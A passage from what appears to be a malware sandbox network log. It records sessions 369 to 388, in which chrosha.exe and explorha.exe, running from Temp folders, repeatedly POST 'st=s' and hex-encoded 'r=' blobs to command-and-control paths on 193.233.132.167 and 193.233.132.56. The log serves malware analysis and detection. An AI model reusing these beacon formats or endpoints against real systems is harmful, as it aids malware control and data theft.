Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
369 | 192.168.2.5 | 50213 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:40.480629921 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:40.729231119 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
370 | 192.168.2.5 | 50214 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:40.803510904 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:41.044143915 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
371 | 192.168.2.5 | 50215 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:40.983812094 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:41.235631943 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
372 | 192.168.2.5 | 50216 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:41.301429033 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:41.555306911 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
373 | 192.168.2.5 | 50217 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:41.602381945 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:41.850049973 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
374 | 192.168.2.5 | 50218 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:41.915607929 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:42.160024881 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
375 | 192.168.2.5 | 50219 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:42.108835936 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:42.364526033 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
376 | 192.168.2.5 | 50220 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:42.412883043 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:42.661989927 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
377 | 192.168.2.5 | 50221 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:42.727035999 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:42.974965096 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
378 | 192.168.2.5 | 50222 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:43.029788971 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:43.274291992 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
379 | 192.168.2.5 | 50223 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:43.232500076 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:43.491569042 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
380 | 192.168.2.5 | 50224 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:43.526215076 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:43.776519060 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
381 | 192.168.2.5 | 50225 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:43.855433941 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:44.104487896 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
382 | 192.168.2.5 | 50226 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:44.135159969 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:44.382802010 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
383 | 192.168.2.5 | 50227 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:44.361315012 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:44.615130901 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
384 | 192.168.2.5 | 50228 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:44.633128881 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:44.881129980 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
385 | 192.168.2.5 | 50229 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:44.971719027 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:45.214735031 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
386 | 192.168.2.5 | 50230 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:45.247432947 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:45.499214888 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
387 | 192.168.2.5 | 50231 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:45.467149973 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:45.720366001 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
388 | 192.168.2.5 | 50232 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
